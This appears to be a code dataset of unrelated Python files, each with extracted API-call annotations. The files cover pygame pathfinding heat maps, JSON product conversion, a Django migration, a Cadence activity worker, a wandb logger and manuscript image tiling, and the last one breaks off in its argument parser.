"""Return the best direction to move in, avoiding models."""
best_d = None
random.shuffle( self.DELTA8 )
heat = self.map[pos[0]][pos[1]]
for d in self.DELTA8:
x2 = d[0] + pos[0]
y2 = d[1] + pos[1]
if exp.scene.on_the_map(x2,y2) and ( self.map[x2][y2] < heat ):
target = exp.scene.get_character_at_spot( (x2,y2) )
if not target:
heat = self.map[x2][y2]
best_d = d
return best_d
def mix( self, other_map, amount ):
for y in range( self.lo_y, self.hi_y ):
for x in range( self.lo_x, self.hi_x ):
self.map[x][y] += other_map.map[x][y] * amount
def show( self, x0, y0 ):
for y in range( y0-2,y0+3):
vals = list()
for x in range( x0-2,x0+3):
if self.scene.on_the_map(x,y):
vals.append( '{:<8}'.format( self.map[x][y] ) )
else:
vals.append( "XXX" )
print(" ".join( vals ))
class AvoidMap( HotMap ):
def __init__( self, scene, hot_points, obstacles=set(), expensive=set(), limits=None, avoid_models=False ):
"""Calculate this hotmap given scene and set of hot points."""
super( AvoidMap, self ).__init__( scene, hot_points, obstacles, expensive=expensive, avoid_models=avoid_models, limits=limits )
for y in range( self.lo_y, self.hi_y ):
for x in range( self.lo_x, self.hi_x ):
if self.map[x][y] < self.EXPENSIVE:
self.map[x][y] *= -1.2
self.process_map( limits )
class PointMap( HotMap ):
def __init__( self, scene, dest, avoid_models = False, expensive=set(), limits=None ):
myset = set()
myset.add( dest )
super( PointMap, self ).__init__( scene, myset, expensive=expensive, avoid_models=avoid_models, limits=limits )
class MoveMap( HotMap ):
"""Calculates movement costs to different tiles. Only calcs as far as necessary."""
def __init__( self, scene, chara, avoid_models = False ):
myset = set()
myset.add( chara.pos )
reach = ( chara.get_move() + 1 ) // 2
super( MoveMap, self ).__init__( scene, myset, limits=pygame.Rect(chara.pos[0]-reach, chara.pos[1]-reach, reach*2+1, reach*2+1 ), avoid_models=avoid_models )
if __name__=='__main__':
import timeit
from . import maps
import random
import pygame
myscene = maps.Scene( 100 , 100 )
for x in range( 5, myscene.width ):
for y in range( 5, myscene.height ):
if random.randint(1,3) == 1:
myscene.map[x][y].wall = maps.BASIC_WALL
myset = set()
myset.add( (23,23) )
class OldWay( object ):
def __init__( self, m ):
self.m = m
def __call__(self):
HotMap( self.m, myset )
class NewWay( object ):
def __init__( self, m ):
self.m = m
self.myrect = pygame.Rect( 20, 20, 5, 5 )
def __call__(self):
HotMap( self.m, myset, limits=self.myrect )
t1 = timeit.Timer( OldWay( myscene ) )
t2 = timeit.Timer( NewWay( myscene ) )
print(t1.timeit(100))
print(t2.timeit(100))
| [
"random.randint",
"random.shuffle",
"pygame.Rect"
] | [((3411, 3438), 'random.shuffle', 'random.shuffle', (['self.DELTA8'], {}), '(self.DELTA8)\n', (3425, 3438), False, 'import random\n'), ((3886, 3913), 'random.shuffle', 'random.shuffle', (['self.DELTA8'], {}), '(self.DELTA8)\n', (3900, 3913), False, 'import random\n'), ((6809, 6834), 'pygame.Rect', 'pygame.Rect', (['(20)', '(20)', '(5)', '(5)'], {}), '(20, 20, 5, 5)\n', (6820, 6834), False, 'import pygame\n'), ((6073, 6163), 'pygame.Rect', 'pygame.Rect', (['(chara.pos[0] - reach)', '(chara.pos[1] - reach)', '(reach * 2 + 1)', '(reach * 2 + 1)'], {}), '(chara.pos[0] - reach, chara.pos[1] - reach, reach * 2 + 1, \n reach * 2 + 1)\n', (6084, 6163), False, 'import pygame\n'), ((6421, 6441), 'random.randint', 'random.randint', (['(1)', '(3)'], {}), '(1, 3)\n', (6435, 6441), False, 'import random\n')] |
import json
import jsonpickle
from pprint import pprint
class Object(object):
pass
prods = Object()
prods.accountId="<KEY>"
prods.locationId="5db938536d49b300017efcc3"
prods.products=[]
prods.categories=[]
with open ('pl.json', 'r') as f:
products_dict = json.load(f)
for item in products_dict["models"]:
prod = Object()
prod.productType=1
prod.plu=item["id"]
prod.price=item["price"]
prod.posProductId=item["id"]
prod.name=item["name"]
prod.posProductCategoryId=item["parentId"]
prod.imageUrl=""
prod.description=item["description"]
prod.deliveryTax=20000
prod.takeawayTax=20000
prods.products.append(prod)
with open ('cat.json', 'r') as f:
category_dict = json.load(f)
for item in category_dict["models"]:
cat = Object()
cat.name=item["name"]
cat.posCategoryId=item["id"]
cat.imageUrl:""
prods.categories.append(cat)
print(jsonpickle.dumps(prods))
| [
"json.load",
"jsonpickle.dumps"
] | [((268, 280), 'json.load', 'json.load', (['f'], {}), '(f)\n', (277, 280), False, 'import json\n'), ((725, 737), 'json.load', 'json.load', (['f'], {}), '(f)\n', (734, 737), False, 'import json\n'), ((915, 938), 'jsonpickle.dumps', 'jsonpickle.dumps', (['prods'], {}), '(prods)\n', (931, 938), False, 'import jsonpickle\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-09-18 04:11
from __future__ import unicode_literals
import CareerTinder.listfield
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CareerTinder', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='hiree',
name='date_of_birth',
),
migrations.RemoveField(
model_name='hiree',
name='name',
),
migrations.AddField(
model_name='hiree',
name='college',
field=models.CharField(default='mit', max_length=100),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='degree',
field=models.CharField(choices=[(b'BA', b"Bachelor's"), (b'MA', b"Master's"), (b'DO', b'Doctorate')], default='ba', max_length=10),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='first_name',
field=models.CharField(default='john', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='last_name',
field=models.CharField(default='doe', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='major',
field=models.CharField(default='cs', max_length=100),
preserve_default=False,
),
migrations.AddField(
model_name='hiree',
name='year',
field=models.IntegerField(default='2019'),
preserve_default=False,
),
migrations.AddField(
model_name='recruiter',
name='hirees',
field=CareerTinder.listfield.ListField(default=b''),
),
migrations.AlterField(
model_name='company',
name='logo',
field=models.ImageField(upload_to=b'media/logos/'),
),
migrations.AlterField(
model_name='hiree',
name='face_picture',
field=models.ImageField(upload_to=b'media/faces/'),
),
migrations.AlterField(
model_name='hiree',
name='resume_picture',
field=models.FileField(upload_to=b'media/resumes/'),
),
]
| [
"django.db.models.IntegerField",
"django.db.models.FileField",
"django.db.models.ImageField",
"django.db.migrations.RemoveField",
"django.db.models.CharField"
] | [((324, 388), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""hiree"""', 'name': '"""date_of_birth"""'}), "(model_name='hiree', name='date_of_birth')\n", (346, 388), False, 'from django.db import migrations, models\n'), ((433, 488), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""hiree"""', 'name': '"""name"""'}), "(model_name='hiree', name='name')\n", (455, 488), False, 'from django.db import migrations, models\n'), ((632, 679), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""mit"""', 'max_length': '(100)'}), "(default='mit', max_length=100)\n", (648, 679), False, 'from django.db import migrations, models\n'), ((834, 963), 'django.db.models.CharField', 'models.CharField', ([], {'choices': '[(b\'BA\', b"Bachelor\'s"), (b\'MA\', b"Master\'s"), (b\'DO\', b\'Doctorate\')]', 'default': '"""ba"""', 'max_length': '(10)'}), '(choices=[(b\'BA\', b"Bachelor\'s"), (b\'MA\', b"Master\'s"), (\n b\'DO\', b\'Doctorate\')], default=\'ba\', max_length=10)\n', (850, 963), False, 'from django.db import migrations, models\n'), ((1117, 1164), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""john"""', 'max_length': '(50)'}), "(default='john', max_length=50)\n", (1133, 1164), False, 'from django.db import migrations, models\n'), ((1322, 1368), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""doe"""', 'max_length': '(50)'}), "(default='doe', max_length=50)\n", (1338, 1368), False, 'from django.db import migrations, models\n'), ((1522, 1568), 'django.db.models.CharField', 'models.CharField', ([], {'default': '"""cs"""', 'max_length': '(100)'}), "(default='cs', max_length=100)\n", (1538, 1568), False, 'from django.db import migrations, models\n'), ((1721, 1756), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '"""2019"""'}), "(default='2019')\n", (1740, 1756), False, 'from django.db import migrations, models\n'), ((2081, 
2125), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': "b'media/logos/'"}), "(upload_to=b'media/logos/')\n", (2098, 2125), False, 'from django.db import migrations, models\n'), ((2252, 2296), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': "b'media/faces/'"}), "(upload_to=b'media/faces/')\n", (2269, 2296), False, 'from django.db import migrations, models\n'), ((2425, 2470), 'django.db.models.FileField', 'models.FileField', ([], {'upload_to': "b'media/resumes/'"}), "(upload_to=b'media/resumes/')\n", (2441, 2470), False, 'from django.db import migrations, models\n')] |
import datetime
import logging
import json
from cadence.activity import ActivityContext
from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, \
RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest
from cadence.conversions import json_to_args
from cadence.workflowservice import WorkflowService
from cadence.worker import Worker
logger = logging.getLogger(__name__)
def activity_task_loop(worker: Worker):
service = WorkflowService.create(worker.host, worker.port)
logger.info(f"Activity task worker started: {WorkflowService.get_identity()}")
try:
while True:
if worker.is_stop_requested():
return
try:
polling_start = datetime.datetime.now()
polling_request = PollForActivityTaskRequest()
polling_request.task_list_metadata = TaskListMetadata()
polling_request.task_list_metadata.max_tasks_per_second = 200000
polling_request.domain = worker.domain
polling_request.identity = WorkflowService.get_identity()
polling_request.task_list = TaskList()
polling_request.task_list.name = worker.task_list
task: PollForActivityTaskResponse
task, err = service.poll_for_activity_task(polling_request)
polling_end = datetime.datetime.now()
logger.debug("PollForActivityTask: %dms", (polling_end - polling_start).total_seconds() * 1000)
except Exception as ex:
logger.error("PollForActivityTask error: %s", ex)
continue
if err:
logger.error("PollForActivityTask failed: %s", err)
continue
if not task.task_token:
logger.debug("PollForActivityTask has no task_token (expected): %s", task)
continue
args = json_to_args(task.input)
logger.info(f"Request for activity: {task.activity_type.name}")
fn = worker.activities.get(task.activity_type.name)
if not fn:
logger.error("Activity type not found: " + task.activity_type.name)
continue
process_start = datetime.datetime.now()
activity_context = ActivityContext()
activity_context.task_token = task.task_token
activity_context.workflow_execution = task.workflow_execution
activity_context.domain = worker.domain
try:
ActivityContext.set(activity_context)
ret = fn(*args)
ActivityContext.set(None)
respond = RespondActivityTaskCompletedRequest()
respond.task_token = task.task_token
respond.result = json.dumps(ret)
respond.identity = WorkflowService.get_identity()
_, error = service.respond_activity_task_completed(respond)
if error:
logger.error("Error invoking RespondActivityTaskCompleted: %s", error)
logger.info(f"Activity {task.activity_type.name}({str(args)[1:-1]}) returned {respond.result}")
except Exception as ex:
logger.error(f"Activity {task.activity_type.name} failed: {type(ex).__name__}({ex})", exc_info=1)
respond: RespondActivityTaskFailedRequest = RespondActivityTaskFailedRequest()
respond.task_token = task.task_token
respond.identity = WorkflowService.get_identity()
respond.details = json.dumps({
"detailMessage": f"Python error: {type(ex).__name__}({ex})",
"class": "java.lang.Exception"
})
respond.reason = "java.lang.Exception"
_, error = service.respond_activity_task_failed(respond)
if error:
logger.error("Error invoking RespondActivityTaskFailed: %s", error)
process_end = datetime.datetime.now()
logger.info("Process ActivityTask: %dms", (process_end - process_start).total_seconds() * 1000)
finally:
worker.notify_thread_stopped()
| [
"logging.getLogger",
"cadence.cadence_types.RespondActivityTaskFailedRequest",
"cadence.workflowservice.WorkflowService.create",
"cadence.activity.ActivityContext.set",
"cadence.cadence_types.RespondActivityTaskCompletedRequest",
"cadence.activity.ActivityContext",
"cadence.workflowservice.WorkflowServi... | [((425, 452), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (442, 452), False, 'import logging\n'), ((509, 557), 'cadence.workflowservice.WorkflowService.create', 'WorkflowService.create', (['worker.host', 'worker.port'], {}), '(worker.host, worker.port)\n', (531, 557), False, 'from cadence.workflowservice import WorkflowService\n'), ((1979, 2003), 'cadence.conversions.json_to_args', 'json_to_args', (['task.input'], {}), '(task.input)\n', (1991, 2003), False, 'from cadence.conversions import json_to_args\n'), ((2305, 2328), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2326, 2328), False, 'import datetime\n'), ((2360, 2377), 'cadence.activity.ActivityContext', 'ActivityContext', ([], {}), '()\n', (2375, 2377), False, 'from cadence.activity import ActivityContext\n'), ((4075, 4098), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4096, 4098), False, 'import datetime\n'), ((607, 637), 'cadence.workflowservice.WorkflowService.get_identity', 'WorkflowService.get_identity', ([], {}), '()\n', (635, 637), False, 'from cadence.workflowservice import WorkflowService\n'), ((785, 808), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (806, 808), False, 'import datetime\n'), ((843, 871), 'cadence.cadence_types.PollForActivityTaskRequest', 'PollForActivityTaskRequest', ([], {}), '()\n', (869, 871), False, 'from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest\n'), ((925, 943), 'cadence.cadence_types.TaskListMetadata', 'TaskListMetadata', ([], {}), '()\n', (941, 943), False, 'from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest\n'), ((1123, 1153), 
'cadence.workflowservice.WorkflowService.get_identity', 'WorkflowService.get_identity', ([], {}), '()\n', (1151, 1153), False, 'from cadence.workflowservice import WorkflowService\n'), ((1198, 1208), 'cadence.cadence_types.TaskList', 'TaskList', ([], {}), '()\n', (1206, 1208), False, 'from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest\n'), ((1431, 1454), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1452, 1454), False, 'import datetime\n'), ((2595, 2632), 'cadence.activity.ActivityContext.set', 'ActivityContext.set', (['activity_context'], {}), '(activity_context)\n', (2614, 2632), False, 'from cadence.activity import ActivityContext\n'), ((2681, 2706), 'cadence.activity.ActivityContext.set', 'ActivityContext.set', (['None'], {}), '(None)\n', (2700, 2706), False, 'from cadence.activity import ActivityContext\n'), ((2733, 2770), 'cadence.cadence_types.RespondActivityTaskCompletedRequest', 'RespondActivityTaskCompletedRequest', ([], {}), '()\n', (2768, 2770), False, 'from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest\n'), ((2857, 2872), 'json.dumps', 'json.dumps', (['ret'], {}), '(ret)\n', (2867, 2872), False, 'import json\n'), ((2908, 2938), 'cadence.workflowservice.WorkflowService.get_identity', 'WorkflowService.get_identity', ([], {}), '()\n', (2936, 2938), False, 'from cadence.workflowservice import WorkflowService\n'), ((3454, 3488), 'cadence.cadence_types.RespondActivityTaskFailedRequest', 'RespondActivityTaskFailedRequest', ([], {}), '()\n', (3486, 3488), False, 'from cadence.cadence_types import PollForActivityTaskRequest, TaskListMetadata, TaskList, PollForActivityTaskResponse, RespondActivityTaskCompletedRequest, RespondActivityTaskFailedRequest\n'), ((3577, 
3607), 'cadence.workflowservice.WorkflowService.get_identity', 'WorkflowService.get_identity', ([], {}), '()\n', (3605, 3607), False, 'from cadence.workflowservice import WorkflowService\n')] |
# Copyright 2020 Toyota Research Institute. All rights reserved.
# Adapted from Pytorch-Lightning
# https://github.com/PyTorchLightning/pytorch-lightning/blob/master/pytorch_lightning/loggers/wandb.py
from argparse import Namespace
from collections import OrderedDict
import numpy as np
import torch.nn as nn
import wandb
from wandb.wandb_run import Run
from packnet_sfm.utils.depth import viz_inv_depth
from packnet_sfm.utils.logging import prepare_dataset_prefix
from packnet_sfm.utils.types import is_dict, is_tensor
class WandbLogger:
"""
Wandb logger class to monitor training.
Parameters
----------
name : str
Run name (if empty, uses a fancy Wandb name, highly recommended)
dir : str
Folder where wandb information is stored
id : str
ID for the run
anonymous : bool
Anonymous mode
version : str
Run version
project : str
Wandb project where the run will live
tags : list of str
List of tags to append to the run
log_model : bool
Log the model to wandb or not
experiment : wandb
Wandb experiment
entity : str
Wandb entity
"""
def __init__(self,
name=None, dir=None, id=None, anonymous=False,
version=None, project=None, entity=None,
tags=None, log_model=False, experiment=None
):
super().__init__()
self._name = name
self._dir = dir
self._anonymous = 'allow' if anonymous else None
self._id = version or id
self._tags = tags
self._project = project
self._entity = entity
self._log_model = log_model
self._experiment = experiment if experiment else self.create_experiment()
self._metrics = OrderedDict()
def __getstate__(self):
"""Get the current logger state"""
state = self.__dict__.copy()
state['_id'] = self._experiment.id if self._experiment is not None else None
state['_experiment'] = None
return state
def create_experiment(self):
"""Creates and returns a new experiment"""
experiment = wandb.init(
name=self._name, dir=self._dir, project=self._project,
anonymous=self._anonymous, reinit=True, id=self._id,
resume='allow', tags=self._tags, entity=self._entity
)
wandb.run.save()
return experiment
def watch(self, model: nn.Module, log: str = 'gradients', log_freq: int = 100):
"""Watch training parameters."""
self.experiment.watch(model, log=log, log_freq=log_freq)
@property
def experiment(self) -> Run:
"""Returns the experiment (creates a new if it doesn't exist)."""
if self._experiment is None:
self._experiment = self.create_experiment()
return self._experiment
@property
def version(self) -> str:
"""Returns experiment version."""
return self._experiment.id if self._experiment else None
@property
def name(self) -> str:
"""Returns experiment name."""
name = self._experiment.project_name() if self._experiment else None
return name
@property
def run_name(self) -> str:
"""Returns run name."""
return wandb.run.name if self._experiment else None
@property
def run_url(self) -> str:
"""Returns run URL."""
return 'https://app.wandb.ai/{}/{}/runs/{}'.format(
wandb.run.entity, wandb.run.project, wandb.run.id) if self._experiment else None
@staticmethod
def _convert_params(params):
if isinstance(params, Namespace):
params = vars(params)
if params is None:
params = {}
return params
def log_config(self, params):
"""Logs model configuration."""
params = self._convert_params(params)
self.experiment.config.update(params, allow_val_change=True)
def log_metrics(self, metrics):
"""Logs training metrics."""
self._metrics.update(metrics)
if 'global_step' in metrics:
self.experiment.log(self._metrics)
self._metrics.clear()
def log_images(self, func, mode, batch, output,
args, dataset, world_size, config):
"""
Adds images to metrics for later logging.
Parameters
----------
func : Function
Function used to process the image before logging
mode : str {"train", "val"}
Training stage where the images come from (serve as prefix for logging)
batch : dict
Data batch
output : dict
Model output
args : tuple
Step arguments
dataset : CfgNode
Dataset configuration
world_size : int
Number of GPUs, used to get logging samples at consistent intervals
config : CfgNode
Model configuration
"""
dataset_idx = 0 if len(args) == 1 else args[1]
prefix = prepare_dataset_prefix(config, dataset_idx)
interval = len(dataset[dataset_idx]) // world_size // config.num_logs
if args[0] % interval == 0:
prefix_idx = '{}-{}-{}'.format(mode, prefix, batch['idx'][0].item())
func(prefix_idx, batch, output)
# Log depth images
def log_depth(self, *args, **kwargs):
"""Helper function used to log images relevant for depth estimation"""
def log(prefix_idx, batch, output):
self._metrics.update(log_rgb('rgb', prefix_idx, batch))
self._metrics.update(log_inv_depth('inv_depth', prefix_idx, output))
if 'depth' in batch:
self._metrics.update(log_depth('depth', prefix_idx, batch))
self.log_images(log, *args, **kwargs)
def log_rgb(key, prefix, batch, i=0):
"""
Converts an RGB image from a batch for logging
Parameters
----------
key : str
Key from data containing the image
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the image
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
rgb = batch[key] if is_dict(batch) else batch
return prep_image(prefix, key,
rgb[i])
def log_depth(key, prefix, batch, i=0):
"""
Converts a depth map from a batch for logging
Parameters
----------
key : str
Key from data containing the depth map
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the depth map
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
depth = batch[key] if is_dict(batch) else batch
inv_depth = 1. / depth[i]
inv_depth[depth[i] == 0] = 0
return prep_image(prefix, key,
viz_inv_depth(inv_depth, filter_zeros=True))
def log_inv_depth(key, prefix, batch, i=0):
"""
Converts an inverse depth map from a batch for logging
Parameters
----------
key : str
Key from data containing the inverse depth map
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the inverse depth map
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
inv_depth = batch[key] if is_dict(batch) else batch
return prep_image(prefix, key,
viz_inv_depth(inv_depth[i]))
def prep_image(prefix, key, image):
"""
Prepare image for wandb logging
Parameters
----------
prefix : str
Prefix added to the key for logging
key : str
Key from data containing the inverse depth map
image : torch.Tensor [3,H,W]
Image to be logged
Returns
-------
output : dict
Dictionary with key and value for logging
"""
if is_tensor(image):
image = image.detach().permute(1, 2, 0).cpu().numpy()
prefix_key = '{}-{}'.format(prefix, key)
return {prefix_key: wandb.Image(image, caption=key)}
| [
"packnet_sfm.utils.logging.prepare_dataset_prefix",
"collections.OrderedDict",
"wandb.Image",
"wandb.init",
"packnet_sfm.utils.types.is_dict",
"wandb.run.save",
"packnet_sfm.utils.depth.viz_inv_depth",
"packnet_sfm.utils.types.is_tensor"
] | [((8142, 8158), 'packnet_sfm.utils.types.is_tensor', 'is_tensor', (['image'], {}), '(image)\n', (8151, 8158), False, 'from packnet_sfm.utils.types import is_dict, is_tensor\n'), ((1803, 1816), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1814, 1816), False, 'from collections import OrderedDict\n'), ((2174, 2356), 'wandb.init', 'wandb.init', ([], {'name': 'self._name', 'dir': 'self._dir', 'project': 'self._project', 'anonymous': 'self._anonymous', 'reinit': '(True)', 'id': 'self._id', 'resume': '"""allow"""', 'tags': 'self._tags', 'entity': 'self._entity'}), "(name=self._name, dir=self._dir, project=self._project, anonymous\n =self._anonymous, reinit=True, id=self._id, resume='allow', tags=self.\n _tags, entity=self._entity)\n", (2184, 2356), False, 'import wandb\n'), ((2401, 2417), 'wandb.run.save', 'wandb.run.save', ([], {}), '()\n', (2415, 2417), False, 'import wandb\n'), ((5060, 5103), 'packnet_sfm.utils.logging.prepare_dataset_prefix', 'prepare_dataset_prefix', (['config', 'dataset_idx'], {}), '(config, dataset_idx)\n', (5082, 5103), False, 'from packnet_sfm.utils.logging import prepare_dataset_prefix\n'), ((6318, 6332), 'packnet_sfm.utils.types.is_dict', 'is_dict', (['batch'], {}), '(batch)\n', (6325, 6332), False, 'from packnet_sfm.utils.types import is_dict, is_tensor\n'), ((6902, 6916), 'packnet_sfm.utils.types.is_dict', 'is_dict', (['batch'], {}), '(batch)\n', (6909, 6916), False, 'from packnet_sfm.utils.types import is_dict, is_tensor\n'), ((7048, 7091), 'packnet_sfm.utils.depth.viz_inv_depth', 'viz_inv_depth', (['inv_depth'], {'filter_zeros': '(True)'}), '(inv_depth, filter_zeros=True)\n', (7061, 7091), False, 'from packnet_sfm.utils.depth import viz_inv_depth\n'), ((7619, 7633), 'packnet_sfm.utils.types.is_dict', 'is_dict', (['batch'], {}), '(batch)\n', (7626, 7633), False, 'from packnet_sfm.utils.types import is_dict, is_tensor\n'), ((7702, 7729), 'packnet_sfm.utils.depth.viz_inv_depth', 'viz_inv_depth', (['inv_depth[i]'], {}), 
'(inv_depth[i])\n', (7715, 7729), False, 'from packnet_sfm.utils.depth import viz_inv_depth\n'), ((8291, 8322), 'wandb.Image', 'wandb.Image', (['image'], {'caption': 'key'}), '(image, caption=key)\n', (8302, 8322), False, 'import wandb\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 3 17:20:06 2018
@author: chrispedder
A routine to crop sections from the images of different manuscripts in the two
datasets to the same size, and with the same magnification, so that the average
script size doesn't create a feature that the neural networks can learn.
Reading the data description of the CLaMM dataset, we find that the images
are 150mm*100mm, so we need to take similar-sized crops from our new target
data. Looking at the bar on the left, we find that 6000px =(341-47) = 294mm
So 1mm = 20.41px. We therefore need to crop 3062 * 2041px from the original
However, to not give away too much, we need to make this crop a little
random. Looking at the test images, 1) Their heights vary by around 100px
AFTER downsampling, so around 170px BEFORE downsampling. 2) Their widths
vary by proportionately less, around 65px AFTER, so 110px BEFORE.
We define a crop function below which achieves precisely this.
To run this routine, call something like `python -m src.data.data_processing
--thow_input_path data/raw/MS157/ --thow_output_path data/external/thow_out
--clamm_input_path data/raw/ICDAR2017_CLaMM_Training/
--clamm_output_path data/external/clamm_out`
The four command line args given here are all required.
"""
import numpy as np
import scipy.io
import random
import scipy.ndimage
import glob
import os
import argparse
from PIL import Image
from random import randint
from typing import List
def clean_THoW_file_list(file_list: List):
    """Filter a list of scraped THoW filenames.

    Folio views and similar non-page images have a letter in the
    fifth-from-last character of their filename (just before the
    '.jpg' extension); page images have a digit there.  Only the
    digit-indexed names are kept.
    """
    kept = []
    for name in file_list:
        if not name[-5].isalpha():
            kept.append(name)
    return kept
class ImageProcessor(object):
    """Crop, downsample and tile manuscript scans so THoW and CLaMM
    images end up at the same physical scale and tile size.

    The constants encode the geometry derived in the module docstring:
    a 3062 x 2041 px crop of the raw THoW scan corresponds to the
    150mm x 100mm CLaMM page area, and a 1.7x downsample matches the
    CLaMM pixel density.

    Parameters
    ----------
    args : argparse.Namespace
        Must carry thow_input_path, thow_output_path, clamm_input_path
        and clamm_output_path (see parse_args).
    """

    def __init__(self, args):
        # Crop images from point CORNER, to size given by DIM
        self.CORNER = [1000, 1400]
        self.DIM = [3062, 2041]
        # To match the training data, we need to downsample images by a
        # factor of 1.7
        self.SCALE = 1.7
        # Set size of training tiles here (we could pick 224*224 to match
        # the expected input size of VGG16 here too)
        self.IM_HEIGHT = 300
        self.IM_WIDTH = 300
        # Set random seed to get the same train-test split when run
        self.SEED = 42
        random.seed(self.SEED)
        # argparse.Namespace holding the four input/output paths
        self.args = args

    def read_raw_from_dir(self, filename):
        """Read an image file and return it as a 2D uint8 grayscale array
        of shape (height, width)."""
        x = Image.open(filename)
        # makes it greyscale - CLaMM data is already grayscale
        x = x.convert('L')
        y = np.asarray(x.getdata(), dtype='uint8')
        return y.reshape((x.size[1], x.size[0]))

    def image_oc_crop(self, img):
        """Crop ``img`` at top-left corner self.CORNER to the size given
        by self.DIM, using numpy slicing."""
        lh, lw = self.CORNER
        dim_x, dim_y = self.DIM
        cropped_img = img[lh:lh + dim_x, lw:lw + dim_y]
        return cropped_img

    def resample_image(self, img):
        """Downsample ``img`` by self.SCALE using cubic splines so the
        scraped scans match the CLaMM pixel density; returns uint8."""
        # retain a single image channel, use cubic splines for resampling
        resampled = scipy.ndimage.zoom(img, 1 / self.SCALE, order=3)
        output = resampled.astype('uint8')
        return output

    def prepare_raw_bytes_for_model(self, input_path):
        """Read, crop and rescale a single raw scan file."""
        input_image = self.read_raw_from_dir(input_path)
        cropped_input = self.image_oc_crop(input_image)
        img = self.resample_image(cropped_input)
        return img

    def tile_crop(self, array):
        """Split ``array`` into a list of IM_HEIGHT x IM_WIDTH tiles,
        discarding partial tiles at the right/bottom edges."""
        array_height, array_width = array.shape
        height_tiles_number = array_height // self.IM_HEIGHT
        width_tiles_number = array_width // self.IM_WIDTH
        tile_list = []
        for i in range(height_tiles_number):
            for j in range(width_tiles_number):
                new_tile = array[i * self.IM_HEIGHT: (i + 1) * self.IM_HEIGHT,
                                 j * self.IM_WIDTH: (j + 1) * self.IM_WIDTH]
                tile_list.append(new_tile)
        return tile_list

    def write_input_data_to_jpg(self, input_path, output_path, THOW=False):
        """Process every raw file under ``input_path`` and write its
        tiles as JPEGs into ``output_path``.

        THOW=True selects '*.jpg' inputs and filters out folio views;
        otherwise the first 500 '*.tif' CLaMM files are used.
        """
        counter = 0
        file_suffix = '*.jpg' if THOW else '*.tif'
        file_name = 'THOW' if THOW else 'CLaMM'
        # get list of files in the raw data directory
        input_files_list = sorted(glob.glob(input_path + file_suffix))
        if THOW:
            input_files_list = clean_THoW_file_list(input_files_list)
        else:
            input_files_list = input_files_list[:500]
        # BUG FIX: the previous os.path.exists + os.mkdir pair raced with
        # concurrent runs; makedirs(exist_ok=True) creates the directory
        # (and any missing parents) without the check-then-create window.
        os.makedirs(output_path, exist_ok=True)
        for element in input_files_list:
            image = self.prepare_raw_bytes_for_model(element)
            new_tile_list = self.tile_crop(image)
            for i, tile in enumerate(new_tile_list):
                # define file names for training example
                tile_file_name = os.path.join(
                    output_path,
                    file_name + str(counter + i) + ".jpg")
                # write three copies of the grayscale image to three separate
                # layers as the VGG16 net expects an RGB input
                tensorized = np.dstack([tile] * 3)
                # create image from tensorized array
                im = Image.fromarray(tensorized)
                # save to path specified in arguments
                im.save(tile_file_name)
                print(
                    "Tile with name {} written to disk".format(tile_file_name))
            counter += len(new_tile_list)
            print("So far {} files written".format(counter))
        print("File writing completed")

    def process_all_files(self):
        """Run the THoW pipeline then the CLaMM pipeline using the paths
        supplied on the command line."""
        print(f'Reading data from {self.args.thow_input_path}, writing to\
 {self.args.thow_output_path}')
        self.write_input_data_to_jpg(self.args.thow_input_path,
                                     self.args.thow_output_path,
                                     THOW=True)
        print(f'Reading data from {self.args.clamm_input_path}, writing to\
 {self.args.clamm_output_path}')
        self.write_input_data_to_jpg(self.args.clamm_input_path,
                                     self.args.clamm_output_path)
        print('All files processed and written to file')
def parse_args():
    """Build the command-line parser for the four required data paths
    and return the parsed argparse.Namespace."""
    parser = argparse.ArgumentParser(description='Command line options for '
        'processing the data files needed to train the model.')
    # (flag, help text) pairs; every option is a required string path.
    options = [
        ('--thow_input_path',
         'give the path to the THOW raw files'),
        ('--thow_output_path',
         'path to where we should write the processed THOW tile files'),
        ('--clamm_input_path',
         'give the path to the CLaMM raw files'),
        ('--clamm_output_path',
         'path to where we should write the processed CLaMM tile files'),
    ]
